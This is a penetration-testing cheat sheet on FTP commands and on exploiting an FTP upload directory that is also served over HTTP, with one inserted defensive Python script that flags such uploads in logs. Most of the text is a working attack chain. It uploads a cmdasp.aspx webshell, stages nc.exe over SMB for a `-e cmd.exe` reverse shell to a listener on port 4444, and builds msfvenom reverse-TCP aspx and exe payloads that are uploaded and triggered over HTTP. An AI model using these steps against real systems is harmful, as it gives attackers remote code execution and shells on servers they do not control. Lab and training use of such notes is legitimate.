FTP

Basics

ftp 10.x.x.x    ..connect
help            ..help
pwd             ..print working directory
dir             ..list directory (also: ls)
cd c:\data      ..change directory
lcd /tmp        ..local change directory
get flag.txt    ..download
put test.txt    ..upload
binary          ..binary transfer mode (graphics, compressed files, audio, executables)
put Potato.exe  ..EXE now uploads intact (ASCII mode corrupts binaries)

FtpHttp Vulnerability

  • If the FTP directory is also served as an HTTP directory

  • Files uploaded over FTP can then be requested, and executed, over HTTP

  • REF: develHTB, ReverseShells
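
Detection side of the same misconfiguration, as an added example (not part of the original notes): flag files uploaded over FTP and later served over HTTP under the same path. The log lines are constructed, the W3C field sets are simplified, and the FTP root is assumed to map 1:1 to the web root.

```python
from pathlib import PurePosixPath

# Extensions the web server may execute, or that are rarely legitimate site uploads.
RISKY_EXT = {".aspx", ".asp", ".ashx", ".exe"}

# Constructed sample logs in W3C extended format (documentation-range addresses).
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.10 anonymous STOR /readme.txt 226
2024-01-01 10:00:05 192.0.2.10 anonymous STOR /cmdasp.aspx 226
2024-01-01 10:00:09 192.0.2.10 anonymous STOR /denied.aspx 550
"""
HTTP_LOG = """#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-01 10:00:20 GET /cmdasp.aspx 192.0.2.10 200
2024-01-01 10:00:25 GET /index.html 198.51.100.7 200
"""

def parse_w3c(text):
    """Yield one dict per record, taking column names from the '#Fields:' header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def risky_uploads(ftp_text):
    """Successful (226) STOR commands whose target has a risky extension."""
    hits = []
    for r in parse_w3c(ftp_text):
        ext = PurePosixPath(r["cs-uri-stem"]).suffix.lower()
        if r["cs-method"].upper() == "STOR" and r["sc-status"] == "226" and ext in RISKY_EXT:
            hits.append(r)
    return hits

def uploaded_then_requested(ftp_text, http_text):
    """Risky uploads later served (200) over HTTP under the same path."""
    uploads = {r["cs-uri-stem"].lower(): r for r in risky_uploads(ftp_text)}
    findings = []
    for r in parse_w3c(http_text):
        up = uploads.get(r["cs-uri-stem"].lower())
        when = r["date"] + " " + r["time"]  # ISO-style, so string order is time order
        if up and r["sc-status"] == "200" and when >= up["date"] + " " + up["time"]:
            findings.append((up["cs-uri-stem"], up["c-ip"], r["c-ip"], when))
    return findings

if __name__ == "__main__":
    for finding in uploaded_then_requested(FTP_LOG, HTTP_LOG):
        print("ALERT upload-then-request:", finding)
```

Any finding means the FTP-writable directory is reachable through the web server; the fix is to separate the two roots or remove write access for the FTP account.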

-----------------
-----------------
Webshell
locate *aspx
cp /usr/share/webshells/aspx/cmdasp.aspx .
ftp 10.x.x.x
put cmdasp.aspx
firefox http://10.x.x.x/cmdasp.aspx

-----------------
-----------------
Reverse
locate nc.exe
cp nc.exe .
ftp 10.x.x.x
put nc.exe
sudo smbserver.py share .     ..or use smbshare
nc -nvlp 4444                 ..nc listener
http://10.x.x.x/cmdasp.aspx   ..execute our nc reverse shell
cmd = \\10.x.x.x\share\nc.exe -e cmd.exe 10.x.x.x 4444

-----------------
-----------------
Payloads
msfvenom --list payloads | grep windows
msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=4444 -f aspx -o shell.aspx
msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=4444 -f exe -o shell.exe
ftp $IP
put shell.aspx
put shell.exe
nc -nvlp 4444
firefox http://$IP/shell.aspx
dir C:\inetpub\wwwroot
C:\inetpub\wwwroot\shell.exe
